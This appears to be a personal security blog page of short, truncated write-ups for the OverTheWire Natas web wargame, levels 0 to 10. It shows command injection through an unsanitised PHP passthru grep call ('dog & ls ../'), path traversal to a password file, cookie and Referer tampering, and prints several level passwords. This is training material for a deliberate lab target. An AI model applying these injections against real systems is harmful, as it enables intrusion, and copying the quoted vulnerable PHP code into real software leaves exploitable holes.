circusmonkey404's Security Site

Over the wire Natas Level 10 Objective: Get password for Level 11 Solution: So here we see an input box and a search button, but this time with this text For security reasons, we now filter on certain characters If we put in anything it searches a dictionary.txt file for the input and displays the output, however if we look in the source code it looks like they are not going to let use a lot of special characters this time if($key != "") {     if(preg_match('/[;|&]/',$key)) {         print "Input contains an illegal character!";     } else {         passthru("grep -i $key dictionary.txt");     } } ?> </pre> Luckily for use we don’t’ need to use any of those special characters to get at the webpass directory using grep So grep man page( http://linuxcommand.org/lc3_man_pages/grep1.html ) NAME        grep, egrep, fgrep, rgrep - print lines matching a pattern SYNOPSIS        grep [OP

Over the wire Natas Level 9 Objective: Get password for Level 10 Solution: So here we see a input box and a search button If we put in anything it searches a dictionary.txt file for the input and displays the output Let’s check out the source code for anything interesting. <pre> <? $key = ""; if(array_key_exists("needle", $_REQUEST)) {     $key = $_REQUEST["needle"]; } if($key != "") {     passthru("grep -i $key dictionary.txt"); } ?> </pre> Ok so it literally just greps the file for the keyword entered, the only check it does is to see if the key is empty I bet we can pipe the input field to get it to return data Let try an ls to see if we can pass directly to the shell like we think dog & ls ../ Output: dictionary.txt ../: main natas0 natas1 natas10 natas11 natas12 natas13 natas14 natas15 natas16 natas17 natas18

Over the wire Natas Level 8 Objective : Get password for Level 9 Solution: So here we get a input box that checks to see if it’s the right key to get the correct password We can see if the source code that the input we give is compared to   a hardcoded string before it gives out the password $encodedSecret = "3d3d516343746d4d6d6c315669563362"; function encodeSecret($secret) {     return bin2hex(strrev(base64_encode($secret))); so it takes our input, base64encodes it, reverses the string, then converts to HEX so theoretically we if we take the hard coded secret and run it through that sequence backwards we should have the value needed to match. I wrote a little python script to do the encoding for me import base64 string = '3d3d516343746d4d6d6c315669563362' print("The String is: ",string, "Length   is :", len(string)) unhex = bytes.fromhex(string).decode('utf-8') print(&

Over the wire Natas Level 7 Objective: Get password for Level 8 Solution : So this page is just two links Home and About If we click on one we can see its calling a php to give us the page http://natas7.natas.labs.overthewire.org/index.php?page=about the source code for home has this hint <!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 --> Looks like we are going to use path traversal to solve this one If we put in natas8 for the page in the PHP we get his error http://natas7.natas.labs.overthewire.org/index.php?page=natas8 Warning: include(natas8): failed to open stream: No such file or directory in /var/www/natas/natas7/index.php on line 21 Warning: include(): Failed opening 'natas8' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/natas/natas7/index.php on line 21 Cool lets try it with the full path Page=/etc/natas_webpass/natas8 http://natas7.natas.labs.

Over the wire Natas Level 6 Objective: Get password for Level 7 Solution: So we have a text box with the label Input Secret and a submit query button Lets check the source code again. Here it looks like the form is taking our password we provide and checking it against another password stored In a variable $_Post[‘secret’] <? include "includes/secret.inc";     if(array_key_exists("submit", $_POST)) {         if($secret == $_POST['secret']) {         print "Access granted. The password for natas7 is <censored>";     } else {         print "Wrong secret";     }     } ?> Let’s see if we can just get to that file /includes/secret.inc and see if we can see the key in there http://natas6.natas.labs.overthewire.org/includes/secret.inc Looks like just a blank white page… but it did load so the thing exists, lets check the source for it <? $secret =

Over the wire Natas Level 5 Objective: Get password for Level 6 Solution: This page just shows a text box Access disallowed. You are not logged in So this is saying we aren’t logged, we just logged in so there must be something else here that is tracking whether we are logged in or not. Lets just take a look at the cookies using a cookie editor to see if there is something there that tracks if we are logged in or not Yup In the cookie for this site we see a value named “ Loggedin ” and is set to 0 Lets try flipping it to 1 and see what happens Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1

Over the wire Natas Level 4 Objective: Get password for Level 5 Solution: This page just shows a text box Access disallowed. You are visiting from "" while authorized users should come only from http://natas5.natas.labs.overthewire.org/ Ok so the message here is pointing us to the referring website. IF we fire up burp suite and turn on intercept we can see this GET /index.php HTTP/1.1 Host: natas4.natas.labs.overthewire.org User-Agent: Mozilla/5.0 (Linux; Android 7.0; PLUS Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.98 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://natas4.natas.labs.overthewire.org/ Cookie: __cfduid=dc1833b1d7b69b3cac3c87671133dc9051557462221; __utma=176859643.791061132.1557462220.1558030716.1570727565.8; __utmz=176859643.1557462220.1.1.utmcsr=(direct)|utmccn=

Over the wire Natas Level 3 Objective: Get password for Level 3 Solution: This page just shows a text box There is nothing on this page Let’s check the source code again There is nothing on this page <!-- No more information leaks!! Not even Google will find it this time... --> </div> Not Even Google will find it this time huh? What do we know that keeps web crawlers from indexing pages?   Robots.txt Let’s check out the robots.txt and see if there are any goodies in there. http://natas3.natas.labs.overthewire.org/robots.txt User-agent: * Disallow: /s3cr3t/ Disallow folder /s3cr3t/    it doesn’t want google to index that folder let’s see what is in there http://natas3.natas.labs.overthewire.org/s3cr3t/ another users.txt file http://natas3.natas.labs.overthewire.org/s3cr3t/users.txt natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

Over the wire Natas Level 2 Objective : Get password for Level 3 Solution : This page just shows a text box There is nothing on this page  Ok let’s check the source and see if there is anything interesting in there In the HTML there is a img file that links to a file named pixel.png in a folder named files There is nothing on this page <img src=" files/pixel.png "> </div> </body></html> Lets see if we can see what else is in that folder http://natas2.natas.labs.overthewire.org/files/ there is a txt file in there named users.txt let’s check it out # username:password alice:BYNdCesZqW bob:jw2ueICLvT charlie:G5vCxkVV3m natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14 eve:zo4mJWyNj2 mallory:9urtcpzBmH natas3 password sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14

Over the wire Natas Level 1 Objective : Get password for Level 2 Solution : This page just shows a text box You can find the password for the next level on this page, but rightclicking has been blocked! No right clicking…. Okay F11 in chrome brings up inspector so let’s use that to get the next password <!--The password for natas2 is ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi -->

Over the wire Natas Level 0 Objective: Get password for Level1 Solution: This page just shows a text box You can find the password for the next level on this page. Checking the source code we find the password for level 1 <!--The password for natas1 is gtVrDuiDfck831PqWsLEZy5gyDz1clto -->